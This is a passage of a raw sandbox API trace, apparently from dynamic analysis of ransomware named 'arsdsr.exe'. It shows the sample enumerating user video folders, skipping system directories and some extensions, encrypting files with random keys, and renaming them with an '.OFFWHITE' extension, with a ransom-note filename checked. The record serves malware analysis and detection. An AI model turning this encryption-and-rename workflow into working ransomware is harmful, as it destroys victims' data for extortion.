[0135.972] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.972] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.972] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.972] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.972] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.973] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1874a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.973] SetLastError (dwErrCode=0x0) [0135.973] WriteFile (in: hFile=0xb0, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.975] GetLastError () returned 0x0 [0135.975] GetLastError () returned 0x0 [0135.975] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1884a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.975] WriteFile (in: hFile=0xb0, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.975] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1894a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.975] WriteFile (in: hFile=0xb0, lpBuffer=0x521ff0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x521ff0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.975] GetProcessHeap () returned 0x500000 [0135.975] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1874a) returned 0x55a7b8 [0135.975] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.975] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x1874a, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x1874a, lpOverlapped=0x0) returned 1 [0135.985] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.985] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x1874a, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x1874a, lpOverlapped=0x0) returned 1 [0135.985] GetProcessHeap () returned 0x500000 [0135.986] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.986] CloseHandle (hObject=0xb0) returned 1 [0135.988] GetProcessHeap () returned 0x500000 [0135.988] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0135.988] GetProcessHeap () returned 0x500000 [0135.988] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0135.989] GetProcessHeap () returned 0x500000 [0135.989] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0135.989] GetProcessHeap () returned 0x500000 [0135.989] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0135.989] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BbLdFAbs w.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BbLdFAbs w.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BbLdFAbs w.avi" [0135.989] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BbLdFAbs w.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BbLdFAbs w.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BbLdFAbs w.avi.OFFWHITE" [0135.989] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BbLdFAbs w.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bbldfabs w.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BbLdFAbs w.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bbldfabs w.avi.offwhite")) returned 1 [0135.990] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0135.990] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0135.990] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0135.990] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0135.990] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0135.990] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0135.990] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0135.990] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0135.990] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0135.990] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0135.990] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0135.990] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0135.990] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0135.990] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" [0135.990] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.990] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.990] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0135.990] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0135.990] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0135.991] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0135.991] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0135.991] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0135.991] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0135.991] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0135.991] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x375e77e0, ftCreationTime.dwHighDateTime=0x1d5d91b, ftLastAccessTime.dwLowDateTime=0x982dc550, ftLastAccessTime.dwHighDateTime=0x1d5e5b7, ftLastWriteTime.dwLowDateTime=0x982dc550, ftLastWriteTime.dwHighDateTime=0x1d5e5b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="ghq_bJyyoBo", cAlternateFileName="GHQ_BJ~1")) returned 1 [0135.991] lstrcmpiW (lpString1="ghq_bJyyoBo", lpString2=".") returned 1 [0135.991] lstrcmpiW (lpString1="ghq_bJyyoBo", lpString2="..") returned 1 [0135.991] lstrcmpiW (lpString1="ghq_bJyyoBo", lpString2="...") returned 1 [0135.991] lstrcmpiW (lpString1="ghq_bJyyoBo", lpString2="windows") returned -1 [0135.991] lstrcmpiW (lpString1="ghq_bJyyoBo", lpString2="$recycle.bin") returned 1 [0135.991] lstrcmpiW (lpString1="ghq_bJyyoBo", lpString2="rsa") returned -1 [0135.991] lstrcmpiW (lpString1="ghq_bJyyoBo", lpString2="ntuser.dat") returned -1 [0135.991] lstrcmpiW (lpString1="ghq_bJyyoBo", lpString2="programdata") returned -1 [0135.991] lstrcmpiW (lpString1="ghq_bJyyoBo", lpString2="appdata") returned 1 [0135.991] lstrcmpiW (lpString1="ghq_bJyyoBo", lpString2="program files") returned -1 [0135.991] lstrcmpiW (lpString1="ghq_bJyyoBo", lpString2="program files (x86)") returned -1 [0135.991] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0135.991] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="ghq_bJyyoBo" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo" [0135.991] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0135.991] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0135.991] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\*.*" [0135.991] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x375e77e0, ftCreationTime.dwHighDateTime=0x1d5d91b, ftLastAccessTime.dwLowDateTime=0x982dc550, ftLastAccessTime.dwHighDateTime=0x1d5e5b7, ftLastWriteTime.dwLowDateTime=0x982dc550, ftLastWriteTime.dwHighDateTime=0x1d5e5b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName=".", cAlternateFileName="")) returned 0x544650 [0135.994] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.994] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x375e77e0, ftCreationTime.dwHighDateTime=0x1d5d91b, ftLastAccessTime.dwLowDateTime=0x982dc550, ftLastAccessTime.dwHighDateTime=0x1d5e5b7, ftLastWriteTime.dwLowDateTime=0x982dc550, ftLastWriteTime.dwHighDateTime=0x1d5e5b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="..", cAlternateFileName="")) returned 1 [0135.995] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0135.995] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.995] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9f2a870, ftCreationTime.dwHighDateTime=0x1d5e138, ftLastAccessTime.dwLowDateTime=0x8f7aa270, ftLastAccessTime.dwHighDateTime=0x1d5d969, ftLastWriteTime.dwLowDateTime=0x8f7aa270, ftLastWriteTime.dwHighDateTime=0x1d5d969, nFileSizeHigh=0x0, nFileSizeLow=0x1148a, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="5TkndxEimBTBrX.avi", cAlternateFileName="5TKNDX~1.AVI")) returned 1 [0135.995] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2=".") returned 1 [0135.995] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2="..") returned 1 [0135.995] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2="...") returned 1 [0135.995] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2="windows") returned -1 [0135.995] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2="$recycle.bin") returned 1 [0135.995] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2="rsa") returned -1 [0135.995] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2="ntuser.dat") returned -1 [0135.995] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2="programdata") returned -1 [0135.995] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2="appdata") returned -1 [0135.995] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2="program files") returned -1 [0135.995] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2="program files (x86)") returned -1 [0135.995] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0135.995] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="5TkndxEimBTBrX.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\5TkndxEimBTBrX.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\5TkndxEimBTBrX.avi" [0135.995] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.995] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.995] PathFindExtensionW (pszPath="5TkndxEimBTBrX.avi") returned=".avi" [0135.995] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0135.995] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0135.995] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0135.995] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0135.995] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0135.996] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0135.996] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0135.996] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0135.996] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0135.996] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0135.996] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0135.996] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0135.996] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0135.996] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0135.996] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0135.996] lstrcmpiW (lpString1="5TkndxEimBTBrX.avi", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.996] GetProcessHeap () returned 0x500000 [0135.996] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522000 [0135.996] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\5TkndxEimBTBrX.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\5tkndxeimbtbrx.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.996] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=70794) returned 1 [0135.996] GetProcessHeap () returned 0x500000 [0135.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0135.997] GetProcessHeap () returned 0x500000 [0135.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0135.997] GetProcessHeap () returned 0x500000 [0135.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0135.997] GetProcessHeap () returned 0x500000 [0135.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0135.997] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.997] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.997] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0135.997] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.997] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.997] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0135.997] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.997] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.997] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.997] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.997] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.998] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.998] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1148a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.998] SetLastError (dwErrCode=0x0) [0135.998] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.000] GetLastError () returned 0x0 [0136.000] GetLastError () returned 0x0 [0136.000] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1158a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.000] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.000] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1168a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.000] WriteFile (in: hFile=0x21c, lpBuffer=0x522000*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522000*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.000] GetProcessHeap () returned 0x500000 [0136.000] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1148a) returned 0x55a7b8 [0136.000] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.000] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x1148a, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x1148a, lpOverlapped=0x0) returned 1 [0136.006] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.006] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x1148a, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x1148a, lpOverlapped=0x0) returned 1 [0136.006] GetProcessHeap () returned 0x500000 [0136.006] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.006] CloseHandle (hObject=0x21c) returned 1 [0136.013] GetProcessHeap () returned 0x500000 [0136.013] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.013] GetProcessHeap () returned 0x500000 [0136.013] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.013] GetProcessHeap () returned 0x500000 [0136.013] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.013] GetProcessHeap () returned 0x500000 [0136.013] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.013] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\5TkndxEimBTBrX.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\5TkndxEimBTBrX.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\5TkndxEimBTBrX.avi" [0136.013] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\5TkndxEimBTBrX.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\5TkndxEimBTBrX.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\5TkndxEimBTBrX.avi.OFFWHITE" [0136.013] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\5TkndxEimBTBrX.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\5tkndxeimbtbrx.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\5TkndxEimBTBrX.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\5tkndxeimbtbrx.avi.offwhite")) returned 1 [0136.014] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ce273f0, ftCreationTime.dwHighDateTime=0x1d5e567, ftLastAccessTime.dwLowDateTime=0x5a3a4750, ftLastAccessTime.dwHighDateTime=0x1d5e701, ftLastWriteTime.dwLowDateTime=0x5a3a4750, ftLastWriteTime.dwHighDateTime=0x1d5e701, nFileSizeHigh=0x0, nFileSizeLow=0x732e, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="6KQNtydP8f.mkv", cAlternateFileName="6KQNTY~1.MKV")) returned 1 [0136.014] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2=".") returned 1 [0136.014] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2="..") returned 1 [0136.014] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2="...") returned 1 [0136.014] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2="windows") returned -1 [0136.014] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2="$recycle.bin") returned 1 [0136.014] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2="rsa") returned -1 [0136.014] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2="ntuser.dat") returned -1 [0136.014] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2="programdata") returned -1 [0136.014] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2="appdata") returned -1 [0136.014] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2="program files") returned -1 [0136.014] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2="program files (x86)") returned -1 [0136.014] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.014] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="6KQNtydP8f.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\6KQNtydP8f.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\6KQNtydP8f.mkv" [0136.015] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.015] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.015] PathFindExtensionW (pszPath="6KQNtydP8f.mkv") returned=".mkv" [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".log") returned 1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".cab") returned 1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".cmd") returned 1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".com") returned 1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".cpl") returned 1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".url") returned -1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".ttf") returned -1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".mp3") returned -1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".pif") returned -1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".mp4") returned -1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".OFFWHITE") returned -1 [0136.015] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0136.015] lstrcmpiW (lpString1="6KQNtydP8f.mkv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.015] GetProcessHeap () returned 0x500000 [0136.015] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522010 [0136.015] CreateFileW 